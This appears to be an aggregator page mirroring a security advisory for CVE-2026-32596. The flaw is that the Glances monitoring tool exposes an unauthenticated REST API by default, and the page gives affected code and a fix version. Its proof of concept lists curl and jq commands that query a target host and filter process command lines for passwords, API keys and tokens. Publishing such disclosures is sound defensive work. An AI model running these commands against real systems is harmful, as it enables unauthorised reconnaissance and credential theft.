Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-wvxv-4j8q-4wjq

Опубликовано: 16 мар. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7

Описание

Glances exposes the REST API without authentication

Summary

Glances web server runs without authentication by default when started with glances -w, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client.

Details

Root Cause: Authentication is optional and disabled by default. When no password is provided, the API router initializes without authentication dependency, and the server binds to 0.0.0.0 exposing all endpoints.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 259-272
if self.args.password: self._password = GlancesPassword(username=args.username, config=config) if JWT_AVAILABLE: jwt_secret = config.get_value('outputs', 'jwt_secret_key', default=None) jwt_expire = config.get_int_value('outputs', 'jwt_expire_minutes', default=60) self._jwt_handler = JWTHandler(secret_key=jwt_secret, expire_minutes=jwt_expire) logger.info(f"JWT authentication enabled (token expiration: {jwt_expire} minutes)") else: self._jwt_handler = None logger.info("JWT authentication not available (python-jose not installed)") else: self._password = None # NO AUTHENTICATION BY DEFAULT self._jwt_handler = None
  • File: glances/outputs/glances_restful_api.py, lines 477-480
if self.args.password: router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)]) else: router = APIRouter(prefix=self.url_prefix) # NO AUTH DEPENDENCY
  • File: glances/outputs/glances_restful_api.py, lines 98-99
self.bind_address = args.bind_address or "0.0.0.0" # BINDS TO ALL INTERFACES self.port = args.port or 61208
  • File: glances/plugins/processlist/__init__.py, lines 127-140
enable_stats = [ 'cpu_percent', 'memory_percent', 'memory_info', 'pid', 'username', 'cpu_times', 'num_threads', 'nice', 'status', 'io_counters', 'cpu_num', 'cmdline', # FULL COMMAND LINE EXPOSED, NO SANITIZATION ]

PoC

  1. Start Glances in default web server mode:
glances -w # Output: Glances Web User Interface started on http://0.0.0.0:61208/
  1. Access API without authentication from any network client:
curl -s http://TARGET:61208/api/4/system | jq .
image
  1. Extract system information:
curl -s http://TARGET:61208/api/4/all > system_dump.json
image
  1. Harvest credentials from process list:
curl -s http://TARGET:61208/api/4/processlist | \ jq -r '.[] | select(.cmdline | tostring | test("password|api-key|token|secret"; "i")) | {pid, username, process: .name, cmdline}'
  1. Example credential exposure:
{ "pid": 4059, "username": "root", "process": "python3", "cmdline": [ "python3", "-c", "import time; time.sleep(3600)", "--api-key=sk-super-secret-token-12345", "--password=MySecretPassword123", "--db-pass=admin123" ] }

Impact

Complete system reconnaissance and credential harvesting from any network client. Exposed endpoints include system info, process lists with full command-line arguments (containing passwords/API keys/tokens), network connections, filesystems, and Docker containers. Enables lateral movement and targeted attacks using stolen credentials.

Ссылки

Пакеты

Наименование

Glances

pip
Затронутые версииВерсия исправления

< 4.5.2

4.5.2

EPSS

Процентиль: 89%
0.04201
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-32596

Дефекты

CWE-200

Связанные уязвимости

ubuntu логотип

CVE-2026-32596

CVSS3: 7.5
ubuntu
12 дней назад

(Glances is an open-source system cross-platform monitoring tool. Prior ...)

nvd логотип

CVE-2026-32596

CVSS3: 7.5
nvd
12 дней назад

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.2, Glances web server runs without authentication by default when started with `glances -w`, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client. Version 4.5.2 fixes the issue.

debian логотип

CVE-2026-32596

CVSS3: 7.5
debian
12 дней назад

Glances is an open-source system cross-platform monitoring tool. Prior ...

EPSS

Процентиль: 89%
0.04201
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-32596

Дефекты

CWE-200